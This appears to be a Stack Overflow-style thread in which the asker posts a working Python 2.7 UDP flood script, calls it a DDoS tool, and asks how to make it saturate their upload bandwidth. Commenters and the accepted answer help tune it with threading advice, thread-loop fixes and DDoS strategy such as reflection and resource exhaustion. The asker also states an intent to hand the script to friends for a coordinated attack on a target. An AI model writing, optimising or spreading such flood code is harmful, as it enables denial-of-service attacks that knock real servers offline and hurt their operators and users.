# Python 2.7 DDos Script is too slow

Tags: python, python-2.7

I am trying to create a DDos Script (for educational use), however currently its too slow and is only using about 0.8Mb of my upload speed (out of about 20Mb).

**UPDATE 3**

I have removed the server connection code to try get this running fast enough and its finally fast enough to max out my upload speed (about 20Mbit/s). Now im just looking for a way to run the connection code on the side every 300ish times the main code is running.

```
import time, socket, os, sys, string, urllib2, threading
print_lock = threading.Lock()

def attack():
    port = 80
    host = 'target ip address'
    message="#I am the bestest in the world. "
    ip = socket.gethostbyname( host )
    ddos = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    ddos.connect((host, port))
    for i in xrange(10000000):
        try:
            ddos.sendto( message, (ip, port))
        except socket.error, msg:
            print("|[Connection Failed]         |")
    ddos.close()

def main():
    print "DOS app started"
    for i in range(10000000):
        t = threading.Thread(target=attack)
        t.daemon = True
        t.start()
        t.join()




if __name__ == "__main__":
    main()
```

P.S: I'm looking into `Cython` however not sure of its functions yet.

Comment: You almost certainly want to use threading here, but you'll need to get rid of all those global variables first.

Comment: As a sidenote, using split as a variable is poor coding style as it eclipses the built in split

Comment: Your script is slow because its using standard lib stuff thats all RFC compliant. Meaning that it waits for conversations with remote servers to complete with a amenable resolution. You need to go low level for speed. - the essence of a DDOS is figuring out a way to make your target use up more resources servicing the request than you spend issuing the request. Reflection and redirection or just plain resource exhaustion. Learn the difference between TCP/UDP and what types of attacks are possible. FWIW, DDOS is the weakest hack technique, aim higher - you deserve it.

Comment: I have been looking into DDos as part of my uni work. The whole point im trying to achieve with this is a real DDos (not a standard Dos). The difference being i can send this to friends and distribute it for better effect while still having control and a target. I will still look into threading as i believe it solves multiple issues in this code. (also didn't see the variable split when i last went through it, thanks)

Comment: I am pretty sure you do not want to wait for first thread to complete in order to launch another. But that's what you told your code to do by writing `t.join()` inside thread-creating loop body.

Comment: Thank you for all the help. I have managed to get it working following all the comments on here. I just have 1 last issue. I keep getting "can't start new thread" error. I checked to see how many threads ran before it errors and it was 815. I dont know how to solve this issue anymore. i tried waiting for threads to close but it slows down too much.

Answer (score 2, accepted):

Use threading because you can create much more throughput. Also, you're checking to see if the host is up really frequently. Instead, you could consider checking if the host is up every x attempts you try to access it.